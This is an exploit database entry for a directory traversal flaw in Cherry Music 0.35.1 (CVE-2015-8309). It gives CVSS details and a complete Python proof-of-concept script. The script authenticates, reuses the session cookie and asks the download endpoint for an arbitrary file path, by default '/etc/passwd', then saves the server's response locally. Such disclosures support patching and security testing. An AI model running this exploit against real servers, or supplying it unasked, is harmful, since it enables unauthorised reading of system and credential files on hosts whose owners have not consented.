Cherry Music 0.35.1 Arbitrary File Disclosure

2016.09.14
Credit: feedersec
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files # Date: 11-09-2016 # Exploit Author: feedersec # Contact: feedersec@gmail.com # Vendor Homepage: http://www.fomori.org/cherrymusic/index.html # Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz # Version: 0.35.1 # Tested on: ubuntu 14.04 LTS # CVE : CVE-2015-8309 import urllib2, cookielib, urllib #set parameters here username = 'admin' password = 'Password01' baseUrl = 'http://localhost:8080/' targetFile = '/etc/passwd' downloadFileName = 'result.zip' #### cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'}) req = urllib2.Request(baseUrl, params) response = opener.open(req) for c in cj: if c.name == "session_id": session_id = c.value opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders.append(('Cookie', 'session_id=' + session_id)) params = urllib.urlencode({'value': '["' + targetFile + '"]'}) request = urllib2.Request(baseUrl + "download", params) response = opener.open(request).read() with open(downloadFileName, 'wb') as zipFile: zipFile.write(response)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top